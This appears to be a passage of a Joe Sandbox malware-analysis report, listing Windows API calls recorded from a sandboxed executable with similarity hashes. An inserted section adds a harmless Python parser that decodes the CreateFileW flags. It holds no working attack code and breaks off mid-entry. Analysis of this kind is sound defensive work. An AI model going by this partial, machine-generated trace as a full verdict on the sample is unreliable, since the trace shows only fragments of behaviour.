                                                                                • Part of subcall function 0040DF60: TlsGetValue.KERNEL32(0000000E), ref: 0040DF77
                                                                              • GetTempFileNameW.KERNEL32(00000000,00416020,00000000,00000000,00000000,00000400,00000000,00000000,00000000,00000000,00000000,00000000,?,004043B9,00000001,00000000), ref: 00401A2A
                                                                              • GetTempFileNameW.KERNEL32(00416020,00000000,00000000,00000000,00000000,00416020,00000000,00000000,00000000,00000400,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00401A7F
                                                                              • GetTempFileNameW.KERNEL32(00416020,00000000,00000000,00000000,00416020,00000000,00000000,00000000,00000000,00416020,00000000,00000000,00000000,00000400,00000000,00000000), ref: 00401AD4
                                                                              • PathAddBackslashW.SHLWAPI(00416020,00000000,00000000,00000000,00416020,00000000,00000000,00000000,00000000,00416020,00000000,00000000,00000000,00000400,00000000,00000000), ref: 00401ADF
                                                                              • PathRenameExtensionW.SHLWAPI(00000000,00000000,00000000,00416020,00000000,00000000,00000000,00416020,00000000,00000000,00000000,00000000,00416020,00000000,00000000,00000000), ref: 00401B1E
                                                                              • GetTempFileNameW.KERNEL32(00416020,00000000,00000000,00000000,00000000,00000000,00416020,00000000,00000000,00000000,00416020,00000000,00000000,00000000,00000000,00416020), ref: 00401B38
                                                                                • Part of subcall function 0040DE20: GetLastError.KERNEL32 ref: 0040DE26
                                                                                • Part of subcall function 0040DE20: TlsGetValue.KERNEL32(0000000E), ref: 0040DE35
                                                                                • Part of subcall function 0040DE20: SetLastError.KERNEL32(?), ref: 0040DE4B
                                                                                • Part of subcall function 0040DE60: TlsGetValue.KERNEL32(0000000E), ref: 0040DE6C
                                                                                • Part of subcall function 0040DE60: RtlAllocateHeap.NTDLL(?,00000000,?), ref: 0040DE99
                                                                                • Part of subcall function 0040DFC0: wcslen.MSVCRT ref: 0040DFD7
                                                                                • Part of subcall function 0040DE60: RtlReAllocateHeap.NTDLL(?,00000000,?,?), ref: 0040DEBC
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000001.1257794553.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000003.00000001.1257794553.0000000000418000.00000040.00000001.00020000.00000000.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_1_400000_drbdmeyP.jbxd
                                                                              Similarity
                                                                              • API ID: FileNameTemp$Value$AllocateErrorHeapLastPath$BackslashExtensionRenamewcslen
                                                                              • String ID:
                                                                              • API String ID: 368575804-0
                                                                              • Opcode ID: 1ba5b1041860197bcb70b5f8865f6e3a244e24124e7517cd294dd1039848c71c
                                                                              • Instruction ID: da94853b8b5bd26d1bd5120d1b9c906e5f4cf8f619d60ffb6644f8987c096960
                                                                              • Opcode Fuzzy Hash: 1ba5b1041860197bcb70b5f8865f6e3a244e24124e7517cd294dd1039848c71c
                                                                              • Instruction Fuzzy Hash: 6651EEB59047006ED601BBB2DD42E7F7B7EEB98318F00883FB540690E2C63D9C559A6D
                                                                              APIs
                                                                              • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000,?,?,?,?,?,00000000), ref: 0040AAD1
                                                                              • CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000004,00000080,00000000,?,?,?,?,?,00000000), ref: 0040AB12
                                                                              • CreateFileW.KERNELBASE(?,C0000000,00000000,00000000,00000002,00000080,00000000,?,?,?,?,?,00000000), ref: 0040AB5C
                                                                              • CreateFileW.KERNEL32(?,40000000,?,00000000,00000005,00000000,00000000,?,?,?,?,00000000), ref: 0040AB7E
                                                                              • RtlAllocateHeap.NTDLL(00000000,00001000,?), ref: 0040ABB7
                                                                              • SetFilePointer.KERNEL32(?,00000000,?,00000002), ref: 0040AC0A
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000001.1257794553.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000003.00000001.1257794553.0000000000418000.00000040.00000001.00020000.00000000.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_1_400000_drbdmeyP.jbxd
                                                                              Similarity
                                                                              • API ID: File$Create$AllocateHeapPointer
                                                                              • String ID:
                                                                              • API String ID: 1439325152-0
                                                                              • Opcode ID: 03187de23769bf5a714144439e1d921a106fae5db2cc0e7624616ee37dc51610
                                                                              • Instruction ID: 35cb0034da6faa60fecaa9fe6ab12df6337e8788845343623408397181d4bc5b
                                                                              • Opcode Fuzzy Hash: 03187de23769bf5a714144439e1d921a106fae5db2cc0e7624616ee37dc51610
                                                                              • Instruction Fuzzy Hash: E451B171204300ABE3218E28DC44B57BAE5EB44764F614A3AFA51A62E0D779EC55CB1E
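The CreateFileW/SetFilePointer entry above is easier to read once the raw hex stack values are decoded into Win32 constants. The following Python is an added example, not part of the Joe Sandbox report or its IDA plugin: it parses API lines in the listing's own "Name.Module(args), ref: addr" format, keeps only the first N stack slots where N is the API's documented parameter count (the listing shows more values than the API takes; treating the remainder as caller stack residue is an assumption about the format, not something the report states), and decodes CreateFileW desired access, creation disposition and attributes plus the SetFilePointer move method. The sample input is constructed from the six lines of that entry.

```python
import re
from dataclasses import dataclass
from typing import Dict, List, Optional

# Constructed sample: the six API lines of the CreateFileW entry in this report,
# copied in the Joe Sandbox IDA plugin format "Name.Module(args), ref: addr".
SAMPLE = """\
CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000,?,?,?,?,?,00000000), ref: 0040AAD1
CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000004,00000080,00000000,?,?,?,?,?,00000000), ref: 0040AB12
CreateFileW.KERNELBASE(?,C0000000,00000000,00000000,00000002,00000080,00000000,?,?,?,?,?,00000000), ref: 0040AB5C
CreateFileW.KERNEL32(?,40000000,?,00000000,00000005,00000000,00000000,?,?,?,?,00000000), ref: 0040AB7E
RtlAllocateHeap.NTDLL(00000000,00001000,?), ref: 0040ABB7
SetFilePointer.KERNEL32(?,00000000,?,00000002), ref: 0040AC0A
"""

# Matches both "Api.Module(args), ref: addr" and the bare "Api.Module ref: addr" form
# the listing uses for CRT calls such as wcslen.MSVCRT.
LINE_RE = re.compile(
    r"(?P<api>\w+)\.(?P<module>\w+)(?:\((?P<args>[^)]*)\),)?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)"
)

# Documented parameter counts (stdcall); slots beyond these are assumed to be caller stack.
ARITY: Dict[str, int] = {
    "CreateFileW": 7, "SetFilePointer": 4, "RtlAllocateHeap": 3, "HeapFree": 3,
    "LoadLibraryExW": 3, "FreeLibrary": 1, "EnumResourceTypesW": 3,
    "GetTempFileNameW": 4, "ShellExecuteExW": 1, "GetExitCodeProcess": 2,
    "CreateThread": 6, "WaitForSingleObject": 2,
}

# Win32 constants for the fields decoded below.
ACCESS = {0x80000000: "GENERIC_READ", 0x40000000: "GENERIC_WRITE",
          0x20000000: "GENERIC_EXECUTE", 0x10000000: "GENERIC_ALL"}
DISPOSITION = {1: "CREATE_NEW", 2: "CREATE_ALWAYS", 3: "OPEN_EXISTING",
               4: "OPEN_ALWAYS", 5: "TRUNCATE_EXISTING"}
ATTRS = {0x80: "FILE_ATTRIBUTE_NORMAL", 0x02: "FILE_ATTRIBUTE_HIDDEN",
         0x04000000: "FILE_FLAG_DELETE_ON_CLOSE"}
MOVE = {0: "FILE_BEGIN", 1: "FILE_CURRENT", 2: "FILE_END"}


@dataclass
class Call:
    api: str
    module: str
    args: List[Optional[int]]  # None where the listing shows '?'
    ref: int                   # address of the call instruction


def parse_calls(text: str) -> List[Call]:
    """Parse listing lines into Call records, trimming args to the API's arity."""
    calls: List[Call] = []
    for line in text.splitlines():
        m = LINE_RE.search(line)
        if not m:
            continue
        args: List[Optional[int]] = []
        if m.group("args"):
            for a in m.group("args").split(","):
                a = a.strip()
                args.append(None if a == "?" else int(a, 16))
        n = ARITY.get(m.group("api"))
        if n is not None:
            args = args[:n]
        calls.append(Call(m.group("api"), m.group("module"), args, int(m.group("ref"), 16)))
    return calls


def decode_flags(value: int, table: Dict[int, str]) -> str:
    """Render a bitmask as 'A|B', appending any bits the table does not name."""
    names = [name for bit, name in table.items() if value & bit]
    rest = value & ~sum(table)
    if rest:
        names.append(f"0x{rest:X}")
    return "|".join(names) if names else "0"


def describe(call: Call) -> str:
    """One human-readable line per call; unknown APIs are echoed with hex args."""
    a = call.args
    if call.api == "CreateFileW" and len(a) >= 6:
        return (f"{call.ref:08X} CreateFileW access={decode_flags(a[1] or 0, ACCESS)} "
                f"disposition={DISPOSITION.get(a[4], str(a[4]))} "
                f"attrs={decode_flags(a[5] or 0, ATTRS)}")
    if call.api == "SetFilePointer" and len(a) >= 4:
        return f"{call.ref:08X} SetFilePointer method={MOVE.get(a[3], str(a[3]))}"
    rendered = ", ".join("?" if x is None else f"{x:X}" for x in a)
    return f"{call.ref:08X} {call.api}({rendered})"


def write_opens(calls: List[Call]) -> List[int]:
    """Addresses of CreateFileW calls that request GENERIC_WRITE (file creation/modification)."""
    return [c.ref for c in calls
            if c.api == "CreateFileW" and len(c.args) > 1
            and c.args[1] is not None and c.args[1] & 0x40000000]


if __name__ == "__main__":
    parsed = parse_calls(SAMPLE)
    for c in parsed:
        print(describe(c))
    print("write opens at:", [f"{r:08X}" for r in write_opens(parsed)])
```

Run against the sample, the four CreateFileW calls decode to a read-only OPEN_EXISTING, two read/write opens (OPEN_ALWAYS and CREATE_ALWAYS) and a write-only TRUNCATE_EXISTING, and the SetFilePointer call seeks from FILE_END; the same parser can be pointed at any other entry in this listing by pasting its API lines into SAMPLE.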
                                                                              APIs
                                                                              • RtlEnterCriticalSection.NTDLL(0041761C), ref: 0040D7FA
                                                                              • RtlAllocateHeap.NTDLL(00000000,00000018), ref: 0040D831
                                                                              • RtlLeaveCriticalSection.NTDLL(0041761C), ref: 0040D88A
                                                                              • RtlAllocateHeap.NTDLL(00000000,00000038,00000000), ref: 0040D89B
                                                                              • RtlInitializeCriticalSection.NTDLL(00000020), ref: 0040D8D7
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000001.1257794553.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000003.00000001.1257794553.0000000000418000.00000040.00000001.00020000.00000000.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_1_400000_drbdmeyP.jbxd
                                                                              Similarity
                                                                              • API ID: CriticalSection$AllocateHeap$EnterInitializeLeave
                                                                              • String ID:
                                                                              • API String ID: 2823868979-0
                                                                              • Opcode ID: 2ec9cf42e2d1736302ec14762d145b98cb1fe75a1bb67cb2000ecd2b7010510a
                                                                              • Instruction ID: 1c1621ef8b81eb37d3c39fa836f306ed5b79470d652240547c7f2301dbf87725
                                                                              • Opcode Fuzzy Hash: 2ec9cf42e2d1736302ec14762d145b98cb1fe75a1bb67cb2000ecd2b7010510a
                                                                              • Instruction Fuzzy Hash: DE31A2B2D007019BC3209F99D844A57BBF4FB44760B15C53EE465A7390D738E908CB98
                                                                              APIs
                                                                                • Part of subcall function 0040DE60: TlsGetValue.KERNEL32(0000000E), ref: 0040DE6C
                                                                                • Part of subcall function 0040DE60: RtlAllocateHeap.NTDLL(?,00000000,?), ref: 0040DE99
                                                                                • Part of subcall function 0040DE20: GetLastError.KERNEL32 ref: 0040DE26
                                                                                • Part of subcall function 0040DE20: TlsGetValue.KERNEL32(0000000E), ref: 0040DE35
                                                                                • Part of subcall function 0040DE20: SetLastError.KERNEL32(?), ref: 0040DE4B
                                                                                • Part of subcall function 0040DFC0: wcslen.MSVCRT ref: 0040DFD7
                                                                                • Part of subcall function 0040DE60: RtlReAllocateHeap.NTDLL(?,00000000,?,?), ref: 0040DEBC
                                                                              • GetModuleHandleW.KERNEL32(00000000,?,00000000,00000000), ref: 004042FB
                                                                              • PathRemoveBackslashW.SHLWAPI(00000000,00000000,00000000,00000001,00000000,00000000,00000001,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 004043F4
                                                                                • Part of subcall function 00402BFA: GetShortPathNameW.KERNEL32(?,?,00002710), ref: 00402C34
                                                                                • Part of subcall function 0040E020: TlsGetValue.KERNEL32(0000000E), ref: 0040E02A
                                                                                • Part of subcall function 00405182: TlsGetValue.KERNEL32(00000000,00402FDE,00000000,00000008,00000001,00000000,00000000,00000000,00000000,00000000,?,00000200,00000000,00000000,00000000,00000000), ref: 00405189
                                                                                • Part of subcall function 00409860: SetEnvironmentVariableW.KERNEL32(?,?,00404434,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000001,00000000,00000000), ref: 00409879
                                                                                • Part of subcall function 00401E55: PathQuoteSpacesW.SHLWAPI(?,00000000,00000000,00000000,00000000,-00000004,00404476,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00401E8A
                                                                              • PathQuoteSpacesW.SHLWAPI(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000001,00000000,00000000,00000000), ref: 004044A7
                                                                              • PathQuoteSpacesW.SHLWAPI(00000001,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000001,00000000,00000000), ref: 004044E1
                                                                                • Part of subcall function 00405492: CreateThread.KERNEL32(00000000,00001000,00000000,00000000,00000000,?), ref: 004054AB
                                                                                • Part of subcall function 00405492: RtlEnterCriticalSection.NTDLL(004176A0), ref: 004054BD
                                                                                • Part of subcall function 00405492: WaitForSingleObject.KERNEL32(?,00000000,00000000,?,?,?,?,00402E2C,00000000,00000000,00000000,0000000A,00000001,00000000,00000000,00000000), ref: 004054D4
                                                                                • Part of subcall function 00405492: CloseHandle.KERNEL32(?,?,?,?,?,00402E2C,00000000,00000000,00000000,0000000A,00000001,00000000,00000000,00000000,00000000,00000000), ref: 004054E0
                                                                                • Part of subcall function 00405492: RtlLeaveCriticalSection.NTDLL(004176A0), ref: 00405523
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000001.1257794553.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000003.00000001.1257794553.0000000000418000.00000040.00000001.00020000.00000000.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_1_400000_drbdmeyP.jbxd
                                                                              Similarity
                                                                              • API ID: Path$Value$QuoteSpaces$AllocateCriticalErrorHandleHeapLastSection$BackslashCloseCreateEnterEnvironmentLeaveModuleNameObjectRemoveShortSingleThreadVariableWaitwcslen
                                                                              • String ID:
                                                                              • API String ID: 1881381519-0
                                                                              • Opcode ID: d8c64dcd585f1b5e06573cdc086111ceee2949358ebd607d45979ef17bbfe3ff
                                                                              • Instruction ID: 95625e34f548e5502c8bb68b533fb61ff434c3c21d69ae2a44b2ba18bfe99ca0
                                                                              • Opcode Fuzzy Hash: d8c64dcd585f1b5e06573cdc086111ceee2949358ebd607d45979ef17bbfe3ff
                                                                              • Instruction Fuzzy Hash: 1822E9B5914700AED200BBF1DD8197F77BDEB98718F10D83FB540AA192CA3CD8465B69
                                                                              APIs
                                                                              • ShellExecuteExW.SHELL32(?), ref: 004020A7
                                                                              • GetExitCodeProcess.KERNEL32(?,?), ref: 004020C6
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000001.1257794553.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000003.00000001.1257794553.0000000000418000.00000040.00000001.00020000.00000000.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_1_400000_drbdmeyP.jbxd
                                                                              Similarity
                                                                              • API ID: CodeExecuteExitProcessShell
                                                                              • String ID: open
                                                                              • API String ID: 1016612177-2758837156
                                                                              • Opcode ID: 4da19c96667bed9e9bef70d0c438878542b475c9845e05a44f1d331ba8485070
                                                                              • Instruction ID: f63886f370766692049a8ab09fc70fe74b01992a8596c344147a8d3c31b217da
                                                                              • Opcode Fuzzy Hash: 4da19c96667bed9e9bef70d0c438878542b475c9845e05a44f1d331ba8485070
                                                                              • Instruction Fuzzy Hash: E9218971008309AFD700EF64C845A9FBBE9EF44308F10882EF198A6291DB79D905DB96
                                                                              APIs
                                                                                • Part of subcall function 0040DF60: TlsGetValue.KERNEL32(0000000E), ref: 0040DF77
                                                                                • Part of subcall function 0040DE20: GetLastError.KERNEL32 ref: 0040DE26
                                                                                • Part of subcall function 0040DE20: TlsGetValue.KERNEL32(0000000E), ref: 0040DE35
                                                                                • Part of subcall function 0040DE20: SetLastError.KERNEL32(?), ref: 0040DE4B
                                                                                • Part of subcall function 00409638: GetModuleFileNameW.KERNEL32(00000000,00000104,00000104,00000000,?,?,?,00401BC5,00000000,00000000,00000000,00000002,00000000,00000000,00000000,00000000), ref: 00409654
                                                                                • Part of subcall function 00409638: wcscmp.MSVCRT ref: 00409662
                                                                                • Part of subcall function 00409638: memmove.MSVCRT ref: 0040967A
                                                                                • Part of subcall function 00405182: TlsGetValue.KERNEL32(00000000,00402FDE,00000000,00000008,00000001,00000000,00000000,00000000,00000000,00000000,?,00000200,00000000,00000000,00000000,00000000), ref: 00405189
                                                                              • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,00000002,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,0040118B,00000000,00000004), ref: 00401BCD
                                                                              • EnumResourceTypesW.KERNEL32(00000000,00000000,00000000), ref: 00401BEA
                                                                              • FreeLibrary.KERNEL32(?,00000000,00000000,00000000,00000002,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,0040118B,00000000), ref: 00401BF2
                                                                                • Part of subcall function 0040DFC0: wcslen.MSVCRT ref: 0040DFD7
                                                                                • Part of subcall function 0040DE60: TlsGetValue.KERNEL32(0000000E), ref: 0040DE6C
                                                                                • Part of subcall function 0040DE60: RtlAllocateHeap.NTDLL(?,00000000,?), ref: 0040DE99
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000001.1257794553.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000003.00000001.1257794553.0000000000418000.00000040.00000001.00020000.00000000.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_1_400000_drbdmeyP.jbxd
                                                                              Similarity
                                                                              • API ID: Value$ErrorLastLibrary$AllocateEnumFileFreeHeapLoadModuleNameResourceTypesmemmovewcscmpwcslen
                                                                              • String ID:
                                                                              • API String ID: 983379767-0
                                                                              • Opcode ID: f99985e6a0fadfcf50563e483824b6179ac324fb850170194da487b215f581e1
                                                                              • Instruction ID: 3462f3606e8cbb1e1a4d79c74de0940f317b4d1ea5cf6404f74aab9d4bf66b3f
                                                                              • Opcode Fuzzy Hash: f99985e6a0fadfcf50563e483824b6179ac324fb850170194da487b215f581e1
                                                                              • Instruction Fuzzy Hash: 4251F7B59047006AE6007BF2DD86E7F66AEDBD4718F10883FB5407D0D2CA3C8C5966AD
                                                                              APIs
                                                                              • SetFilePointer.KERNELBASE(?,?,?,00000001), ref: 0040AFF8
                                                                              • memcpy.MSVCRT ref: 0040B032
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000001.1257794553.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000003.00000001.1257794553.0000000000418000.00000040.00000001.00020000.00000000.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_1_400000_drbdmeyP.jbxd
                                                                              Similarity
                                                                              • API ID: FilePointermemcpy
                                                                              • String ID:
                                                                              • API String ID: 1104741977-0
                                                                              • Opcode ID: fafebd8826c96d2b2db8682312df0f91d37c55b82f074fe812bb41d959714341
                                                                              • Instruction ID: ace082a42c8b9570e8fa48c2980c6e4681abbcae92d9a1b023345ff456592002
                                                                              • Opcode Fuzzy Hash: fafebd8826c96d2b2db8682312df0f91d37c55b82f074fe812bb41d959714341
                                                                              • Instruction Fuzzy Hash: 4B313A392007009FC220DF29D844E5BB7E5EFD8714F04882EE59A97750D335E919CFA6
                                                                              APIs
                                                                              • TlsGetValue.KERNEL32(0000000E), ref: 0040DE6C
                                                                              • RtlAllocateHeap.NTDLL(?,00000000,?), ref: 0040DE99
                                                                              • RtlReAllocateHeap.NTDLL(?,00000000,?,?), ref: 0040DEBC
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000001.1257794553.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000003.00000001.1257794553.0000000000418000.00000040.00000001.00020000.00000000.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_1_400000_drbdmeyP.jbxd
                                                                              Similarity
                                                                              • API ID: AllocateHeap$Value
                                                                              • String ID:
                                                                              • API String ID: 2497967046-0
                                                                              • Opcode ID: 12a9e260dbc5041e106ecfc4060b29adff0858ebc3c8cdb12623e96d50297f69
                                                                              • Instruction ID: e6d91f3b09335801e5746b2964150cf116aaa33277573073d0b775b4e860d931
                                                                              • Opcode Fuzzy Hash: 12a9e260dbc5041e106ecfc4060b29adff0858ebc3c8cdb12623e96d50297f69
                                                                              • Instruction Fuzzy Hash: E511B974A00208EFCB04DF98D894EAABBB6FF88315F10C559E9099B354D735AA41CB94
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000001.1257794553.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000003.00000001.1257794553.0000000000418000.00000040.00000001.00020000.00000000.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_1_400000_drbdmeyP.jbxd
                                                                              Similarity
                                                                              • API ID: CreateDirectorywcslenwcsncpy
                                                                              • String ID:
                                                                              • API String ID: 961886536-0
                                                                              • Opcode ID: 358e928ecd82f29180d8c39010668dd472303d741ba965430bb1c2cb3b350df1
                                                                              • Instruction ID: 630a5c6db6187271ae83db4eaeb36511880b8bdc4cdf20ec5a399f16e344c0a7
                                                                              • Opcode Fuzzy Hash: 358e928ecd82f29180d8c39010668dd472303d741ba965430bb1c2cb3b350df1
                                                                              • Instruction Fuzzy Hash: 0F01DBB08113189BCB24DB64CC8DABA7378DF00300F6446BBE455E21D1E77A9AA4DB4A
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000001.1257794553.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000003.00000001.1257794553.0000000000418000.00000040.00000001.00020000.00000000.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_1_400000_drbdmeyP.jbxd
                                                                              Similarity
                                                                              • API ID: Initializememset
                                                                              • String ID: ,u
                                                                              • API String ID: 640720207-1962302170
                                                                              • Opcode ID: 4c5f23a674a8f7b46c984437bbca4f970f706a3573d2b0b577e765091421c05e
                                                                              • Instruction ID: 781e80edae316a95334d3837f50a89f25f26191aceb080d9ad1fe250ea93eb12
                                                                              • Opcode Fuzzy Hash: 4c5f23a674a8f7b46c984437bbca4f970f706a3573d2b0b577e765091421c05e
                                                                              • Instruction Fuzzy Hash: 3AE0E6B594030CBBDB409FD0DC0EF9D7B7CE704705F404565F50496181EBB596048B95
                                                                              APIs
                                                                                • Part of subcall function 0040D438: RtlEnterCriticalSection.NTDLL(00000020), ref: 0040D443
                                                                                • Part of subcall function 0040D438: RtlLeaveCriticalSection.NTDLL(00000020), ref: 0040D4BE
                                                                              • CreateFileW.KERNELBASE(?,80000000,00000000,00000000,00000003,00000080,00000000,?,00000000,?,?,?,004033A4,00000000,00000000,00000000), ref: 0040AD93
                                                                              • RtlAllocateHeap.NTDLL(00000000,00001000), ref: 0040ADB5
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000001.1257794553.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000003.00000001.1257794553.0000000000418000.00000040.00000001.00020000.00000000.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_1_400000_drbdmeyP.jbxd
                                                                              Similarity
                                                                              • API ID: CriticalSection$AllocateCreateEnterFileHeapLeave
                                                                              • String ID:
                                                                              • API String ID: 2608263337-0
                                                                              • Opcode ID: 90f7faf706f975316c83b07ac6ced370c6fd09a1887d2f170a25e0c4fd74ef8c
                                                                              • Instruction ID: cb55299900a1a52b407eca00395bc400cfc912b247b49f0a026709af4e8a3faf
                                                                              • Opcode Fuzzy Hash: 90f7faf706f975316c83b07ac6ced370c6fd09a1887d2f170a25e0c4fd74ef8c
                                                                              • Instruction Fuzzy Hash: 0411D031100300ABC2305F5AEC48F57BBAAEFC5761F11863EF5A5A26E0C77698558B69
                                                                              APIs
                                                                                • Part of subcall function 0040DCBD: HeapFree.KERNEL32(00000000,-00000018,00000200,00000000,0040DB7B,00000200,?,?,?,0040112D,0000000C,000186A1,00000007,0041607C,00417090,00000004), ref: 0040DCFE
                                                                              • RtlAllocateHeap.NTDLL(00000000,FFFFFFDD), ref: 0040DB9A
                                                                              • memset.MSVCRT ref: 0040DBD5
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000001.1257794553.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000003.00000001.1257794553.0000000000418000.00000040.00000001.00020000.00000000.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_1_400000_drbdmeyP.jbxd
                                                                              Similarity
                                                                              • API ID: Heap$AllocateFreememset
                                                                              • String ID:
                                                                              • API String ID: 2774703448-0
                                                                              • Opcode ID: dd641588fb5d4f2848f248cc7d9855a33aeab08ce04c044a64c52d6b87a3c813
                                                                              • Instruction ID: 4684dd51efb4be1c7f6cbbcd141334eab977ef2b41965c3d3424e441a95aa271
                                                                              • Opcode Fuzzy Hash: dd641588fb5d4f2848f248cc7d9855a33aeab08ce04c044a64c52d6b87a3c813
                                                                              • Instruction Fuzzy Hash: 8C117C729047149BC320DF49D840A4BBBE8FF98B50F05452EF989A7351D774EC04CBA5
                                                                              APIs
                                                                              • HeapFree.KERNEL32(00000000,?,00000000,00000000,?,?,004033E8,00000000,00000000,00000800,00000000,00000000,00000000), ref: 0040A9B3
                                                                              • FindCloseChangeNotification.KERNELBASE(00000000,00000000,?,?,004033E8,00000000,00000000,00000800,00000000,00000000,00000000), ref: 0040A9BB
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000001.1257794553.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000003.00000001.1257794553.0000000000418000.00000040.00000001.00020000.00000000.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_1_400000_drbdmeyP.jbxd
                                                                              Similarity
                                                                              • API ID: ChangeCloseFindFreeHeapNotification
                                                                              • String ID:
                                                                              • API String ID: 1642550653-0
                                                                              • Opcode ID: 1101ea52ee8bc232e257b11b4dfa0e022e50a41f92f453deb7857e88e1fe02c5
                                                                              • Instruction ID: 4b594e9f44d889535f58429decad5894e80191ff52abe98a3990b8650259e3e7
                                                                              • Opcode Fuzzy Hash: 1101ea52ee8bc232e257b11b4dfa0e022e50a41f92f453deb7857e88e1fe02c5
                                                                              • Instruction Fuzzy Hash: 45F08272505700ABC7222B99FC05F8BBB72EB91764F12893AF610210F8C7355861DB5D
                                                                              APIs
                                                                                • Part of subcall function 0040DF60: TlsGetValue.KERNEL32(0000000E), ref: 0040DF77
                                                                              • RemoveDirectoryW.KERNEL32(00000000,-0000012C,004023BA,00000000,00000001,00000000,00000000,00000000,00000002,00000000,00000000,00416020,00000001,00000000,00000000,00000064), ref: 00402000
                                                                              • RemoveDirectoryW.KERNEL32(00000000,-0000012C,004023BA,00000000,00000001,00000000,00000000,00000000,00000002,00000000,00000000,00416020,00000001,00000000,00000000,00000064), ref: 0040200B
                                                                                • Part of subcall function 004053C7: WaitForSingleObject.KERNEL32(00000000,00000000,00000000,00401FC5,00000000,-0000012C,004023BA,00000000,00000001,00000000,00000000,00000000,00000002,00000000,00000000,00416020), ref: 004053D7
                                                                                • Part of subcall function 00405436: TerminateThread.KERNEL32(00000000,00000000,00000000,?,?,-0000012C,00401FD4,00000000,-0000012C,004023BA,00000000,00000001,00000000,00000000,00000000,00000002), ref: 00405446
                                                                                • Part of subcall function 00405436: RtlEnterCriticalSection.NTDLL(004176A0), ref: 00405452
                                                                                • Part of subcall function 00405436: RtlLeaveCriticalSection.NTDLL(004176A0), ref: 00405486
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000001.1257794553.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000003.00000001.1257794553.0000000000418000.00000040.00000001.00020000.00000000.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_1_400000_drbdmeyP.jbxd
                                                                              Similarity
                                                                              • API ID: CriticalDirectoryRemoveSection$EnterLeaveObjectSingleTerminateThreadValueWait
                                                                              • String ID:
                                                                              • API String ID: 1205394408-0
                                                                              • Opcode ID: a4995793a58d15065b79c121d9b25a2068aad365eb3bcf9e7b176d1495691666
                                                                              • Instruction ID: 98356af5a986153e62a16f1a7b9a52d9cbcc3c42f58cdbaee6b44a4a02fae465
